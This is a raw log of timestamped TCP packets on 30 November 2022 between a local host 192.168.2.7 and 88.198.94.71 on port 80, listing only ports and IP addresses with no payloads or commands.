Nov 30, 2022 00:10:05.008729935 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.008745909 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.008757114 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.008764982 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.008775949 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.008785009 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.008822918 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.008822918 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.008851051 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.008925915 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.008943081 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.008963108 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.008979082 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.008999109 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.009015083 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.009016991 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.009032011 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.009033918 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.009057999 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.009095907 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.009111881 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.009133101 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.009147882 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.009149075 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.009162903 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.009165049 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.009181023 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.009182930 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.009196043 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.009216070 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.009227037 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.009232044 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.009244919 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.009253025 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.009273052 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.009291887 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.009294033 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.009304047 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.009310007 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.009325981 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.009341002 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.009356976 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.009372950 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.009443045 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.009465933 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.009483099 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.009516001 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.009646893 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.035460949 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.035490036 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.035510063 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.035531998 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.035660982 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.035660982 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.035734892 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.035758972 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.035803080 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.035824060 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.035857916 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.035927057 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.035969973 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.036062002 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.036365032 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.036387920 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.036416054 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.036437035 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.036465883 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.036477089 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.036487103 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.036530018 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.036537886 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.036537886 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.036659956 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.037056923 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.037081003 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.037108898 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.037134886 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.037161112 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.037272930 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.037295103 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.037319899 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.037328959 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.037342072 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.037369967 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.037389994 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.037398100 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.037398100 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.037444115 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.037475109 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.037508011 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.037581921 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.037616968 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.037642956 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.037657976 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.037686110 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.037702084 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.037724018 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.037734032 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.037772894 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.038049936 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.039187908 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.039216042 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.039300919 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.039330959 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.039369106 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.042985916 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.043009043 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.043143988 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.043711901 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.043739080 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.043761015 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.043780088 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.043807983 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.043865919 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.044076920 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.044105053 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.044105053 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.044718027 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.044742107 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.044760942 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.044786930 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.044801950 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.044819117 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.044836044 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.044862986 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.049796104 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.049916029 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.049945116 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.050017118 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.075669050 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.075690031 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.075714111 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.075732946 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.075776100 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.075781107 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.075799942 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.075834990 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.075836897 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.075836897 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.075855017 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.075871944 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.075879097 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.075920105 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.075948000 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.075967073 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.075989962 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.076016903 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.076036930 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.076059103 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.076061010 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.076081038 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.076097012 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.076100111 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.076133013 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.076174974 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.076219082 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.076237917 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.076272011 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.076287031 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.076294899 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.076319933 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.076333046 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.076351881 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.076360941 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.076385021 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.076401949 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.076441050 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.076464891 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.076499939 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.076528072 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.076548100 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.076570034 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.076570988 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.076590061 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.076605082 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.076610088 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.076627016 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.076627970 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.076661110 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.076670885 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.076689959 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.076730013 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.076941013 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.076972961 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.077197075 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.077689886 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.077708960 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.077801943 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.077807903 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.077857971 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.081733942 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.081753969 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.082041025 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.082442999 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.082495928 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.082743883 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.082763910 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.082787991 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.082807064 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.082833052 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.082844019 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.082859993 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.082869053 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.082895041 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.082902908 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.082921982 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.082937956 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.082959890 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.082978964 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.082988024 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083013058 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083019018 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083031893 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083051920 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083056927 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083071947 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083103895 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083110094 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083128929 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083175898 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083183050 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083189964 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083214998 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083240032 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083259106 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083278894 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083282948 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083298922 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083323002 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083328009 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083342075 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083362103 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083364010 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083380938 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083405018 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083410978 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083424091 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083442926 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083446980 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083462000 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083481073 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083484888 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083499908 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083523989 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083528996 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083544016 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083568096 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083571911 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083586931 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083606005 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083611965 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083626032 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083652020 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083662987 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083683014 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083693027 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083708048 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083725929 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083750963 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083755016 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083770990 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083798885 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083801031 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083822012 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083832026 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083841085 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083844900 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083861113 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083878040 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083880901 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083900928 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083910942 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083910942 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083920002 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083940029 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083950043 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083970070 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.083970070 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.083990097 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084002018 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084013939 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084033966 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084053040 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084062099 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084072113 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084099054 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084109068 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084129095 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084148884 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084160089 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084172964 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084192038 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084209919 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084227085 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084228992 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084239960 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084248066 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084255934 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084268093 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084284067 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084286928 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084322929 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084327936 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084347010 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084347010 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084367037 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084384918 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084399939 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084399939 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084404945 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084417105 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084424973 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084433079 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084445000 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084464073 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084494114 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084503889 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084513903 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084522009 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084532976 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084548950 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084553003 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084569931 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084573030 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084593058 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084594965 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084609032 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084611893 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084629059 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084631920 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084650993 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084670067 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084678888 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084687948 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084693909 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084707022 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084732056 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084738016 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084750891 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084768057 CET	49708	80	192.168.2.7	88.198.94.71
